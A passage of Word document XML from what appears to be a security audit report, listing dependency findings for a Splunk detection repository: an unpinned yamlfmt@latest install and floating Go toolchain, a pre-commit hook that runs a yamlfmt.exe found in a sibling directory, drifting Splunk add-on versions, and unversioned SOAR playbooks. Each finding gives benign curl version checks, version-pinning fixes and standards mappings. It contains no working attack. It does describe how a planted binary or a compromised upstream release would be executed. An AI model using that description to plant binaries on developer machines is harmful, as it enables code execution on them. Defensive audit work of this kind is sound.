        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t>: Unpinned external Go binary (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt@latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and floating Go toolchain used by CI and by the pre-commit hook; hook also searches a sibling directory for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt.exe</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49</w:t>
        <w:tab/>
        <w:t xml:space="preserve">      - name: Set up Go</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50</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        uses: actions/setup-go@v7</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52</w:t>
        <w:tab/>
        <w:t xml:space="preserve">      - name: Install yamlfmt</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53</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        run: |</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54</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          go install github.com/google/yamlfmt/cmd/yamlfmt@latest</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42</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    possible_paths = [</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43</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        Path.home() / 'go' / 'bin' / 'yamlfmt',</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47</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        # Check in repo yamlfmt-main folder (for development)</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48</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        Path(__file__).parent.parent.parent / 'yamlfmt-main' / 'yamlfmt.exe',</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49</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>go install ...@latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resolves to whatever </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>google/yamlfmt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has most recently tagged (v0.21.0 today, verified via proxy.golang.org); the Go module proxy + sumdb do verify that the *chosen* version's bytes are authentic, so this is less dangerous than unpinned pip, but a malicious new upstream tag would still be executed automatically. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/setup-go@v7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>go-version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so the compiler itself floats (Go 1.27.1). On developer machines the pre-commit hook will happily execute any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> found on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>~/go/bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/usr/local/bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt-main/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>one level above the repository checkout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:48</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) - a path an attacker with write access to the developer's home directory could plant (low value: such an attacker already has code execution). Semgrep flags the subprocess call at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:111</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dangerous-subprocess-use-tainted-env-args</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); arguments are repo file paths and the hook does not use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shell=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so there is no injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = upstream Go module tag / local filesystem -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>subprocess.run([yamlfmt, '-conf', ..., file])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (upstream compromise) / local path is defense-in-depth only. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl https://proxy.golang.org/github.com/google/yamlfmt/@latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{"Version":"v0.21.0","Time":"2026-01-05T18:33:02Z",...}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; nothing in the repo records this version. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/workflows/yaml-validation.yml</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 name: Set up Go</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uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e   # v7.0.0</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with:</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go-version: '1.25.14'</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cache: false</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 name: Install yamlfmt (pinned)</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run: |</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go install github.com/google/yamlfmt/cmd/yamlfmt@v0.21.0</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echo "$HOME/go/bin" &gt;&gt; "$GITHUB_PATH"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .pre-commit-config.yaml - use the upstream pre-commit hook instead of a PATH probe</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 repo: https://github.com/google/yamlfmt</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rev: v0.21.0</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hooks:</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 id: yamlfmt</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files: ^detections/.*\.(yml|yaml)$</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args: [-conf, .yamlfmt]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">and delete the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt-main/yamlfmt.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> probe (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt-hook.py:47-48</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Why it works: an explicit module version is verified against the Go checksum database, the pre-commit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pins the hook source, and Dependabot's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pre-commit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ecosystem (already configured) will bump it. No regression: identical formatter, same config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-494 Download of Code Without Integrity Check; CWE-427. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools, T1574.007 Hijack Execution Flow: Path Interception by PATH Environment Variable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SR-4 Provenance, CM-7 Least Functionality, SA-22 Unsupported System Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.19 Installation of software on operational systems, A.5.21 Managing information security in the ICT supply chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-08 — Splunk TA pins drift from Splunkbase and from each other (10 apps a major version behind)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.7). Exploitability: Test-fidelity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contentctl.yml:31-264 vs install.yml:1-42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Splunk TA/app pins drift from Splunkbase and from each other (10 apps a major version behind; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>install.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> disagree on 5 shared apps)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datasource-dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> job keeps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>install.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/*.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> current, but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the list actually installed into the local/CI test container via S3) is updated by hand and has fallen behind on 20 of 38 apps - 10 by a full major version. Detections are therefore unit-tested against CIM 8.5 / Windows TA 10.0.1 field extractions while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>install.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> declares CIM 8.7 / ES 8.7 as the integration target. Besides test-fidelity risk, old TAs can carry their own vulnerable bundled libraries (TAs vendor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>urllib3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cryptography</w:t>
      </w:r>
      <w:r>
        <w:t>, etc.); those run only in the disposable test container, so the security impact is low. ES itself (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>install.yml:6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.7.0) is one patch behind 8.7.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: N/A. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (quality/lifecycle). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Splunkbase API, 2026-10-06, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -L 'https://splunkbase.splunk.com/api/v1/app/742/release/?limit=1&amp;order=latest'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.0.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; full comparison table in Section (i)-d. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: generate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>install.yml</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the same scheduled job so there is a single source of truth, and record hashes (DEP-03). Minimal patch today (bump the five disagreeing entries to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>install.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- uid: 1621</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title: Splunk_SA_CIM</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appid: Splunk_SA_CIM</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version: 8.7.0</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hardcoded_path: https://attack-range-appbinaries.s3.us-west-2.amazonaws.com/splunk-common-information-model-cim_870.tgz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- uid: 3185</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title: Splunk Add-on for Microsoft IIS</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appid: SPLUNK_TA_FOR_IIS</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version: 2.0.0</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hardcoded_path: https://attack-range-appbinaries.s3.us-west-2.amazonaws.com/splunk-add-on-for-microsoft-iis_200.tgz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> already mirrors the latest Splunkbase release of each </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>supported_TA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the bucket using exactly this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;title&gt;_&lt;version-without-dots&gt;.tgz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> naming, so the objects should already exist.) Extend </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datasource-dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng update-data-source-tas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *and* rewrite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or add a CI check that fails when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>install.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> disagree on a shared </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-1395 Dependency on Vulnerable Third-Party Component. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.002 Supply Chain Compromise: Compromise Software Supply Chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-8 System Component Inventory, SI-2 Flaw Remediation, SA-22 Unsupported System Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID.AM Identify - Asset Management, PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.8 Management of technical vulnerabilities, A.8.19 Installation of software on operational systems. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-09 — SOAR playbooks declare no app versions and depend on unversioned community functions and platform-bundled libraries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/*.json (131 blocks app_version empty); playbooks/risk_notable_import_data.py:405-406</w:t>
      </w:r>
    </w:p>
    <w:p>
